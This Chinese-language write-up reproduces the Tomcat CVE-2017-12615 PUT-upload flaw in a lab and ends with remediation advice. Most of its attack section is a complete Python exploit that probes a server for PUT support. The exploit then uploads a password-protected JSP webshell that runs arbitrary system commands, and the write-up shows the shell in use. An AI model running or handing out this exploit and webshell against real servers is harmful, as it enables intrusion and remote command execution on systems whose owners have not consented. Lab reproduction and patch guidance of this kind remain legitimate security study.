漏洞原理

TomcatServlet是在conf/web.xml配置的,通过配置文件可知,当后缀名为.jsp.jspx的时候
是通过JspServlet处理请求的,而其他的精通文件是通过DefaultServlet处理的
可以得知:"1.jsp "(末尾有一个空格)并不能匹配到JspServlet,而是会交由DefaultServlet去处理
当处理PUT请求时:
会调用resources.bind:dirContext为FileDirContext:调用rebind创建文件
又由于Windows不允许" "(空格)作为文件名结尾,所以会创建一个".jsp"文件,导致代码执行

漏洞环境

1
2
3
漏洞靶机 Win 2003x64 :192.168.136.136
PC主机(Python环境) :192.168.1.103
漏洞存在范围:Tomcat-7.0.0-Tomcat-7.0.81

图片

环境搭建

1
2
3
win 2003x64 安装 Java环境

Tomcat7.0.75下载:http://archive.apache.org/dist/tomcat/tomcat-7/v7.0.75/bin/apache-tomcat-7.0.75.exe

图片

图片

开启HTTP PUT

找到Tomcat的安装目录下的confweb.xml

图片

图片

1
2
3
4
5
readonly            Is this context "read only", so HTTP
commands like PUT and DELETE are
rejected? [true]

这个意思就是说:当前是只读模式,是不允许修改的

找到org.apache.catalina.servlets.DefaultServlet方法:

图片

添加如下代码并保存:

1
2
3
4
<init-param>
<param-name>readonly</param-name>
<param-value>false</param-value>
</init-param>

图片

修改完之后,重启Tomcat:

图片

漏洞复现

Python EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#! -*- coding:utf-8 -*-

import httplib

import sys

import time

body = '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("hacker".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("Test By Power_Liu");}%>'''

try:

conn = httplib.HTTPConnection(sys.argv[1])

conn.request(method='OPTIONS', url='/ffffzz')

headers = dict(conn.getresponse().getheaders())

if 'allow' in headers and \
headers['allow'].find('PUT') > 0 :

conn.close()

conn = httplib.HTTPConnection(sys.argv[1])

url = "/" + str(int(time.time()))+'.jsp/'

#url = "/" + str(int(time.time()))+'.jsp::$DATA'

conn.request( method='PUT', url= url, body=body)

res = conn.getresponse()

if res.status == 201 :

#print 'shell:', 'http://' + sys.argv[1] + url[:-7]

print 'shell:', 'http://' + sys.argv[1] + url[:-1]

elif res.status == 204 :

print 'file exists'

else:

print 'error'

conn.close()

else:

print 'Server not vulnerable'

except Exception,e:

print 'Error:', e

运行Python-EXP脚本:

1
2
3
python2 tomcat-CVE-2017-12615.py 192.168.136.136:8080

得到的shell:http://192.168.136.136:8080/1574766773.jsp

图片

得到一枚Webshell:

图片

1
访问:http://192.168.136.136:8080/1574766773.jsp?pwd=hacker&cmd=ipconfig

图片

漏洞修复

Tomcat更新到该漏洞被修复的版本(例如:Tomcat:8.5.23)
readonlyinit-param不应该将false首先设置。如果该参数保留到默认(true),则攻击者无法上传文件。
最后可以在前端安装WAF等防护软件来阻止PUTDELETE请求。